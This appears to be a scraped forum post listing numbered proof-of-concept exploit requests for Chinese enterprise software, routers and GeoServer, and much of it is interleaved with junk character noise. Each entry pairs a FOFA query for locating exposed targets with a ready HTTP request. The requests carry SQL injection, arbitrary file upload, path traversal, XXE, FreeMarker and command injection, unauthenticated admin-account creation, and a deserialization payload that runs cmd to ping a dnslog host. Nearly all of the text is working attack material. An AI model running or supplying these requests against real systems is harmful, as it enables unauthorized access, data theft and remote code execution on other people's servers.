POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1. F9 O n. A! l! a& V) g
Host: x.x.x.x
; ^& F3 w5 U! W) C$ s K; ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36: P3 F8 V |- {# F, D
Content-Type: application/json
8 o* F' w! x6 h' r r5 y+ Q/ |$ I
B4 P5 D d3 ?- K/ R{* ]! l! G( a5 G; @0 ~8 b# }2 v7 o
"storeID":{
0 s" N% s% O! @) d3 N* H "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
2 ?, _7 U, u2 q; d+ _ "MethodName":"Start",
$ L- `( j: t) \+ T/ G "ObjectInstance":{
5 [2 k2 a" Q6 R8 Y( N6 u- X' Q5 M7 } "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",4 e" |! D, X9 ?! ~6 _( x! I1 Y
"StartInfo": {% x2 O, `$ d7 @# P U/ `
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
( K/ `6 {1 ~& p3 _% l) Z) _6 m "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
1 M6 B" s5 ~' w. Y3 A }
0 u4 d- Z/ U1 u3 q" @# j# O. {2 B }
( v n4 O- E$ F; ~ Q/ ~# v/ u }
5 i. h6 `" B9 f3 F3 R3 H}
' o% T6 y' x- d5 c' _: S3 c+ q/ I y) d; F7 z8 C* i
* z1 p/ u% K! @* q7 G8 @0 f& E' J
57. 畅捷通T+ keyEdit.aspx SQL注入
" M/ ?7 i: a3 ~" ]5 tFOFA:app="畅捷通-TPlus"
5 w* v1 ~" H5 v' p0 r: c' j# f5 VGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
( q" p+ z; p! U* @/ LHost: host
- x% ~( s! f* k! {User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
) e& h& m' |5 g1 m/ P% g) w+ fAccept-Charset: utf-80 O3 }% h6 L% t) }4 Y7 E4 N
Accept-Encoding: gzip, deflate
1 Q, ~" I/ m0 s0 O) vConnection: close0 L, h, G- U& ]8 C% \; H6 N1 b( Z
; Y/ L, v! G& h- f0 [6 O9 p L* e/ |6 i$ F* ]) p
58. 畅捷通T+ KeyInfoList.aspx sql注入# X5 D9 E8 b7 d7 L
FOFA:app="畅捷通-TPlus"
8 g) L1 `4 {% Z6 M) x5 ~. EGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1+ N* b6 u0 Q; v3 g9 R9 S. M0 L
Host: your-ip
0 v2 S/ A- T( ?, a `6 {User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 X( U* M! N7 f4 j
Accept-Charset: utf-8$ W6 f- @7 }9 E7 d8 s/ }
Accept-Encoding: gzip, deflate; }, [4 N0 m/ s, s$ l
Connection: close
7 p, A! B# r9 ~' N5 z6 l% ?% f: n5 w& P6 `
* x, A1 V. m3 {59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
* |, y; _. ~( }FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
6 z n- T4 t% m' r# p* F" GPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.10 b# Z. M4 f4 q# Y3 p7 a
Host: 192.168.86.128:9090
- ?0 U2 Y7 @) z. hUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 O ^) w, M! v# d6 s1 YConnection: close- D; @" @. k4 t, ~- ?& |. p
Content-Length: 1669
G2 Z1 T2 c. j$ b3 kAccept: */*
2 d/ R3 L5 R8 r. k+ j1 ]) ^- DAccept-Language: en$ Z! [; G6 R4 \1 I4 X u. Q
Content-Type: application/x-www-form-urlencoded
5 l% d$ ?* ]4 w3 }, v+ ^6 \Accept-Encoding: gzip5 N! I% m2 Q; Y, m; ~& F
Z7 f5 x1 g& q3 B, XPAYLOAD
) F$ j* q, l# _( g, k- b+ ~ ~$ Q' z& h
# N) r+ g5 V5 P9 Z! y1 a: z
60. 百卓Smart管理平台 importexport.php SQL注入
W8 ]; [; u0 A) h5 `0 TFOFA:title="Smart管理平台"& g5 s7 _; k% U
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
; R* Q) P# A/ Q! c; z9 M" nHost:
, {8 \+ Y4 G4 {1 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.365 {5 f5 d: d; x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 _5 C8 O' E: j4 }3 C8 s' K( IAccept-Encoding: gzip, deflate/ c! {7 m7 c# O. O- E
Accept-Language: zh-CN,zh;q=0.9
' `# Q. a! |% O' z1 zConnection: close$ l u, L, P& \6 K% I
% D$ p' B: q+ P' c- x" J: Q3 y, s5 y" l
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
+ U8 {3 e4 D8 t' X/ JFOFA: title="欢迎使用浙大恩特客户资源管理系统"# f% @+ t% Q) E+ S0 M3 t
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1* f- X0 }/ W% _: D
Host: x.x.x.x
- ~7 P' I8 u/ X, @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* J/ Q$ F+ o6 w) E7 _
Connection: close+ p/ v6 f9 y: m
Content-Length: 27; |3 [3 N# _8 t9 L# a9 X/ T) z
Accept: */*
5 ]2 i: h) q; ~, t# X. J3 f, |7 QAccept-Encoding: gzip, deflate0 V w1 o- E& f
Accept-Language: en0 I; z$ }0 @, T% F$ I
Content-Type: application/x-www-form-urlencoded( R' j/ F r( s
$ d7 x4 P I0 E- k. E, ^ S8uxssX66eqrqtKObcVa0kid98xa
7 @0 ?% b7 A2 E: V- G" s5 A* N2 P, O3 r$ j# y$ ~
: |3 ^- v& S$ |: J! @- F
62. IP-guard WebServer 远程命令执行
0 P' ^. e' _4 E8 V0 b( HFOFA:"IP-guard" && icon_hash="2030860561"3 S9 K) Q# i0 R9 u( j9 t! x
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
% x \6 W; j8 V0 V* sHost: x.x.x.x3 y" x/ g" C% s0 C- B% c( c
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36# Y) W1 x6 Q/ Q( `. j
Connection: close
1 v& k2 g: F o, iAccept: */* G& f9 ^2 ^9 |4 ?1 m' H
Accept-Language: en! p v' [, u! k
Accept-Encoding: gzip
# B% W5 w+ {" K! J' @3 A/ F' U2 ]6 }! z" ?' @
9 p; I4 p% N. @0 k3 b
访问, d X! `* l+ s) @2 M1 B! \
4 f* v6 ^ {2 L; C3 p5 F* Z9 YGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1+ v5 @: q0 a& h( y# W4 o" X
Host: x.x.x.x6 B6 U, S4 |: w( G" o; ` d
+ L$ T, \! D. f; W/ H* N9 C7 I
- D; ~6 R% J% Y" }, T" b63. IP-guard WebServer任意文件读取
F8 P+ c6 B( L4 v. \IP-guard < 4.82.0609.0
0 t2 k; {6 O* r& @3 N- UFOFA:icon_hash="2030860561"( q2 |, I' W- p E
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
8 { q! n) t/ Z# nHost: your-ip
) Y9 a/ E5 i5 g$ }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: `8 k! Z; r) [4 ]$ P! U' M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. S$ Z P3 R9 ?. \4 k
Accept-Encoding: gzip, deflate
. H0 `+ m) U" p6 h. |5 K( D9 _Accept-Language: zh-CN,zh;q=0.9
* Q: x, V" Y; M8 y( A8 R+ O9 VConnection: close# J! l; _! k: [$ L A& B$ }
Content-Type: application/x-www-form-urlencoded( f* M+ ], b3 z2 T
* }8 S( b1 D3 {+ ]
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A. E6 N) D: ^1 _/ l) w: D: G
, E5 l/ k5 \; n$ Z. \" y& t64. 捷诚管理信息系统CWSFinanceCommon SQL注入: G. W* U6 ^$ v4 m. z! j
FOFA:body="/Scripts/EnjoyMsg.js"
- ?+ m4 U; Q, T4 R, qPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
' d' \2 Y& K; q7 B. u( JHost: 192.168.86.128:9001
- P9 m6 ^8 e$ _2 s+ T3 q/ q* {# CUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36; n0 X/ b+ W7 X0 I
Connection: close
& ]; D% B" g! H \3 jContent-Length: 369/ d/ }6 `* f4 r, G. @
Accept: */*
2 w" r/ h& D# o8 M' jAccept-Language: en
; v# f9 V- P; l- }Content-Type: text/xml; charset=utf-8
0 I: n5 z& Y3 n. e- Y2 N0 }- U+ |% [Accept-Encoding: gzip1 V3 W! Y2 F( H% Z7 S* j' Y
1 }+ z8 V" l+ \0 ]6 K
<?xml version="1.0" encoding="utf-8"?>5 E) q7 k# h; Z- _1 b3 [1 u
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
6 F6 t' w# Q3 N6 a3 t& s- Z6 n( h. x<soap:Body>9 W) _4 U! y' j
<GetOSpById xmlns="http://tempuri.org/">8 ?5 g* ^) ?* z/ b$ q
<sId>1';waitfor delay '0:0:5'--+</sId>
% g1 f# G& h0 Q4 l, P1 M; D6 @4 h) a/ F </GetOSpById>
) u4 x" P3 a. S8 e$ w' z/ Y </soap:Body>
, A$ |0 A3 ^9 d1 O</soap:Envelope>
+ i! L" k' Q# T5 J
: G5 Y" }" T/ D# k* f* a
v5 c) n+ |; o8 G# y65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
0 R. {6 N% n3 r; r) E% vFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"2 D: L; T2 h; r
响应200即成功创建账号test123456/123456( a* R/ R: W# s# V" Y# W- @
POST /SystemMng.ashx HTTP/1.18 E8 @/ Z9 I1 N( R; V+ x+ I
Host:, t. |1 q% J3 c2 k. F& X$ m8 ?
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
% U- @0 ?. t6 z2 G& `Accept-Encoding: gzip, deflate
0 {& C2 U6 {: t- H2 S4 yAccept: */*. w2 }& R$ l4 B2 @, T1 n
Connection: close3 x8 W) a3 R1 P U1 I
Accept-Language: en
/ H9 j$ g3 {% X! x* H0 q0 [' OContent-Length: 174
2 ?( b0 W8 }& y- n* m& G/ j& e. M) Q: U& c+ ^3 F9 m
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
% ? O9 c" {* C' `: w4 n- T
' U/ w; O% f$ e- U$ T$ n8 {1 s |: V$ r% p K) p" ]9 r
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
; g5 b3 P7 X GFOFA:app="万户ezOFFICE协同管理平台"9 R: F6 K C. w I$ k% Z, o
" w6 ^) |" s' ^GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
& c( e" K4 A1 |Host: x.x.x.x1 m2 y1 C9 e/ s: ^, b6 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36+ |3 Y7 l, r2 w3 |. k
Connection: close
' l# A2 r% Z, _- ~Accept: */*2 ^1 `9 ]$ E, h% X
Accept-Language: en
% l+ S% F$ } W4 m y2 O" b# X( IAccept-Encoding: gzip3 d1 T3 J1 }. C
" K; h6 o a( t
/ {, o9 _6 N3 Z
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
9 j3 W4 b+ \( {3 f1 ?/ ~# l; e4 `1 v' F$ S6 m/ P$ _
67. 万户ezOFFICE wpsservlet任意文件上传4 P' `; n' {2 W
FOFA:app="万户网络-ezOFFICE"3 ^; l4 c0 B2 i7 ~5 m
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
. L! T N" r5 _9 r- NPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1* `) j' I9 Q4 ?: G( O
Host: x.x.x.x
& Y# R8 X d. a+ L2 |% w- wUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
; d8 g# w( H. a f9 z) GContent-Length: 173
0 q. N3 S3 b0 f6 fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
: y- \1 K; d& n, D) v9 J; ?Accept-Encoding: gzip, deflate
/ ?% K) o5 @4 O* a6 Y N' r' LAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3" {& F! q- M" M* k
Connection: close
[; b1 Q+ M: T5 vContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
( _8 K% S9 m1 H- y" _. {DNT: 1
( {; a9 t) _# M. I, S$ }2 J2 c6 sUpgrade-Insecure-Requests: 1
$ D8 R J* U5 B2 [$ w
* F0 ?; Q* a/ ~8 F--ufuadpxathqvxfqnuyuqaozvseiueerp4 r1 [7 {7 R3 y8 I* N2 A! B" @
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
7 T9 ?1 z) N7 W" d1 C; b/ {6 M6 x2 [) i7 X8 Z
<% out.print("sasdfghjkj");%>
% B: T0 L# I& ^) |' e--ufuadpxathqvxfqnuyuqaozvseiueerp--9 y) S" V0 L; Y; U+ D" S* w, X* E
. V. H V7 m/ A3 a2 n
, l; I' T+ @3 e文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp( p1 ^2 c$ V, |9 t# {
9 \, q! n( {" a9 t
68. 万户ezOFFICE wf_printnum.jsp SQL注入
. u% E R& z5 H0 i/ P7 Z( n& OFOFA:app="万户ezOFFICE协同管理平台"
" B) Q* K& }5 a+ T m1 t& iGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1, _, ]0 Z9 R# }4 [2 T) G; ~& t. a
Host: {{host}}
$ [! e9 q$ @( c G8 I' DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36! ~8 Q3 v; u8 _/ c
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+ _$ j. X X: U F4 e# f! sAccept-Encoding: gzip, deflate s+ L5 e# U P; x& V4 I7 R
Accept-Language: zh-CN,zh;q=0.9
& \' R: p! }. }# o" b ~% KConnection: close& y& a3 f$ W- J- i- c! A! @. k
) [+ J. `. F" A" J3 z1 k0 G4 \+ ~3 s; |/ q5 J
69. 万户 ezOFFICE contract_gd.jsp SQL注入
2 ]7 U6 |9 c% F' P* r aFOFA:app="万户ezOFFICE协同管理平台": ]; n+ R" e2 e+ w
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
+ j0 }2 C6 x5 K; [2 w+ _Host: your-ip
3 Z9 z4 R$ i5 H) u7 y( H2 ?& mUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 [1 T8 o% ?! _5 Z: j x
Accept-Encoding: gzip, deflate
$ m$ A0 w- X; Y9 s8 VAccept: */*7 B8 X9 Z3 D+ {
Connection: keep-alive
- @4 z: I0 K# T9 e) I+ n+ f' k, }. X" u% K" }0 h4 _
7 ^' c' N! C+ {3 W70. 万户ezEIP success 命令执行- N9 c% h5 B8 N* L
FOFA:app="万户网络-ezEIP"
. g8 M e# u" W7 S! ?( ZPOST /member/success.aspx HTTP/1.1
5 r1 m( L0 e6 W" q( o" X' BHost: {{Hostname}}! l. ~$ J3 r% L% b" B6 C% m1 ~, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
5 L' }4 v3 y) u. M/ ]% w$ Y3 FSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
+ q$ H* |3 a7 fContent-Type: application/x-www-form-urlencoded6 H# A% |# |* l* l) n! D8 G/ j) A) S" m
TYPE: C/ |( t- c# K, X6 ?$ Z8 Q* S% n
Content-Length: 16702
% o2 `6 [( U' R8 y& d0 h
6 m( t- }& v Z6 g) Z. C__VIEWSTATE=PAYLOAD
* }; b6 E3 G+ [& u. `- j A
7 r4 c# p# H6 x6 B q- w0 P( P. j5 I; g8 A! x
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
/ d, q3 }+ U' B' [& mFOFA:body="PM2项目管理系统BS版增强工具.zip"
; Q, l$ O: b: s' D4 I. gGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
7 q! e G" |2 t1 E1 }Host: x.x.x.xx.x.x.x3 V% m2 e' \0 e8 `8 ~$ c& P: y
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* R1 n- Z1 z3 }2 Q( _/ R* VConnection: close4 q8 t9 Y1 ?: y0 U2 M
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ K6 ~% k( ^* C( z3 c) x& j
Accept-Encoding: gzip, deflate
# n, a) p/ A5 Q x, X4 [, JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" c H+ B. f5 m( c1 C" ?' IUpgrade-Insecure-Requests: 14 }4 s# c9 S0 h- F, D! z
: r$ |: |0 |0 i( N$ @! r+ G
9 M8 R6 F9 g& V' f" V# w. u9 |% V" N72. 致远OA getAjaxDataServlet XXE
; {2 V; g1 r SFOFA:app="致远互联-OA"
6 @, t0 w' ]8 Y. sPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1/ P% j7 o( C; c; c9 e
Host: 192.168.40.131:8099
; ]" f. m& m6 i. w: d3 ?User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36, }, U' }; k/ y+ g& \2 G
Connection: close$ k& f: }# X; w
Content-Length: 583
' O( U! G9 \! r ZContent-Type: application/x-www-form-urlencoded1 {/ }. _" U4 L, C2 @5 l" R8 S
Accept-Encoding: gzip$ j0 r& E: \) }7 H1 a: y: j
4 G% ?2 l4 t. r" E5 t PS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
l7 o2 m# J" `- f* A1 \) Y; Y# s: D: ]/ s: _* Z# q
, h5 ^6 r5 }+ `% \0 P% J- n
73. GeoServer wms远程代码执行2 U5 L; ^. g* ?* a- u
FOFA:icon_hash=”97540678”1 @9 o6 G; o7 \6 i9 U
POST /geoserver/wms HTTP/1.1
* `9 o7 v/ P; E2 _% xHost: { e+ H7 l6 Q! q9 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36! d; }& k/ ]0 n- v- w* j
Content-Length: 19819 F. V: Z5 V* r R
Accept-Encoding: gzip, deflate3 K" Q2 }( V) G2 N6 I5 {
Connection: close4 b( j" x# ]" q. F
Content-Type: application/xml
6 ]/ X6 ?8 D% q" ~SL-CE-SUID: 3
0 C& U, N# ?2 M; \( J& X3 L: B( S" y6 u- j4 G
PAYLOAD1 R7 j$ D8 I0 n- b5 V
, X3 L1 c$ b* V" Q" {3 A0 y, P" h' f0 Q2 D' I+ I; R! O" S
74. 致远M3-server 6_1sp1 反序列化RCE
4 m% q, ~) v- e: H6 G% ]0 UFOFA:title="M3-Server"
6 A# H) H: {, M' d6 }PAYLOAD6 |0 R1 p* O% A
) P! B) k! Z+ E4 { n4 ~$ t0 u75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
. p6 X2 y3 L C3 TFOFA:app="TELESQUARE-TLR-2005KSH"5 K8 m+ Z2 f- B N! N: I9 V' P
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.17 q7 {+ l6 R+ G$ F
Host: x.x.x.x
+ y; D$ N H# l5 ]9 s/ @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% l2 S+ E/ g: o( i( `* fConnection: close3 x/ M! x; i5 ]! C5 v* ^9 w& x4 ^$ p
Accept: */*2 h# ?3 O! b9 Y" p% y& M. ]! X
Accept-Language: en: R$ D, M9 m' f0 F
Accept-Encoding: gzip/ H7 v2 `: S. }' A; ~
3 V" c% S2 O/ B& C- e g
4 c; u- r# n3 }1 u) ^$ r4 G% cGET /cgi-bin/test28256.txt HTTP/1.1
& O( q9 J& ^5 K" r% F( N. d/ VHost: x.x.x.x5 o+ F8 r5 y% y+ R1 ^7 [
4 X4 O" a3 k" ?: [3 i8 d
|6 X) c Y" [! j% D2 d* J K76. 新开普掌上校园服务管理平台service.action远程命令执行
$ \9 q0 x" i! D7 S1 cFOFA:title="掌上校园服务管理平台"
2 b4 W; j9 c t$ z! H8 _) }POST /service_transport/service.action HTTP/1.1
. o1 q3 |0 ~7 ^ g2 IHost: x.x.x.x2 w! g% S! Q) w& H6 G6 ^8 @: `: M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.06 d" H: Q, L- E! E9 c; S1 Z
Connection: close
, a8 X0 A+ T4 t' I- k3 v, p: o3 dContent-Length: 211
( x1 R d' _) l0 M. pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 `) P4 P, |4 B
Accept-Encoding: gzip, deflate
$ O) S% {: j r+ b, q6 D0 oAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" n& k( {2 x4 L# r8 m! k! t
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
, ~/ o) m' M/ i, ~& dUpgrade-Insecure-Requests: 16 t6 W2 } C. u8 n0 s n
8 |% g9 f5 s; ?! D; m( E0 Y{& D" F8 e% T, c4 m% X
"command": "GetFZinfo",% a7 z; [1 I7 Q6 L: r; `1 g
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
2 J: z8 k+ I" ?4 l3 C e1 t ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
* ^# m# _% y, x" b}
0 S4 z( X! ]/ Y- H: _
+ e7 S, ]7 Q: W& X; N9 E
5 n' R+ l1 X. q. m' KGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
9 o, v: R1 `8 s. S& GHost: x.x.x.x
8 X( C; ^& _2 @1 _ [' y9 [
. z6 x2 E5 t# E; S0 \$ @
9 \/ e! h* M3 c1 D8 F( d
& q3 S6 e7 _: b- b! Q" z ~77. F22服装管理软件系统UploadHandler.ashx任意文件上传% \! T) T0 X6 ^! D9 L& T
FOFA:body="F22WEB登陆"
5 T: j% b3 K5 O/ I; v" wPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1. I0 e% C3 a& J4 ~, F
Host: x.x.x.x
) v6 P6 s' C! M& L1 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! m, N0 ?5 d" I
Connection: close, l$ v0 B# l" `% K4 |' [1 r
Content-Length: 433
' s' o. |" _) ]4 R6 Q2 v3 I. P! v" uAccept: */*
! G- P {. A) ^7 R! [. KAccept-Encoding: gzip, deflate
( c& o) P- _* M: mAccept-Language: zh-CN,zh;q=0.97 F5 ^: S2 |( v* E
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
* J( d4 y3 B: m% i$ T6 P9 w/ t* t$ i' ]5 @4 g
------------398jnjVTTlDVXHlE7yYnfwBoix" @) @% z4 l( K6 Y( l8 U' i1 T
Content-Disposition: form-data; name="folder"
2 [7 K3 S0 U& t* n8 x/ M$ @0 k7 W6 v+ s
/upload/udplog
6 I0 h1 }. d0 q9 Y------------398jnjVTTlDVXHlE7yYnfwBoix
0 M/ M: H8 @& B9 X8 R1 x5 n/ w, FContent-Disposition: form-data; name="Filedata"; filename="1.aspx") L6 t( }8 q( y# G, F7 p' W
Content-Type: application/octet-stream! Q; ]: g; g6 Q0 p7 ~
$ M( Z. l* z1 d! |
hello1234567
- h ]* g7 m& ^& k------------398jnjVTTlDVXHlE7yYnfwBoix
3 g: P* a6 f5 { c2 T, `. o JContent-Disposition: form-data; name="Upload"
^7 V: E! H. H$ v$ l( w
3 U7 ] {% R; z+ e/ M( YSubmit Query- G: M5 u8 s8 R7 J) f3 }5 M2 ~
------------398jnjVTTlDVXHlE7yYnfwBoix--0 I0 `8 t& D: q' r( m Y
4 D+ d5 R; a& V
( d0 n% r$ Z& j; B78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传) A& i$ ?9 ?# A ?
FOFA:icon_hash="2001627082"- C; c& ^; Z6 \/ j$ A6 Z
POST /Platform/System/FileUpload.ashx HTTP/1.1
$ y9 F# g& ?) F& ?% _0 `2 _Host: x.x.x.x
3 l7 p7 R" f6 ?, V, l/ [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
$ O9 Z9 P" Q7 s( iConnection: close# ], `( s. ^% j# I, y
Content-Length: 3363 y- f; @0 N1 e1 `0 y
Accept-Encoding: gzip
% D3 e6 _) T" F$ L9 ]$ AContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
2 D d3 E3 ?( ]/ x9 G% A/ {4 G1 M/ i! f1 J. X6 I
------YsOxWxSvj1KyZow1PTsh98fdu6l
2 |& G. L0 I# ^5 nContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
6 s! l1 h* s1 {( `1 P/ K# ^Content-Type: image/png
. T% B' g! \2 |" O
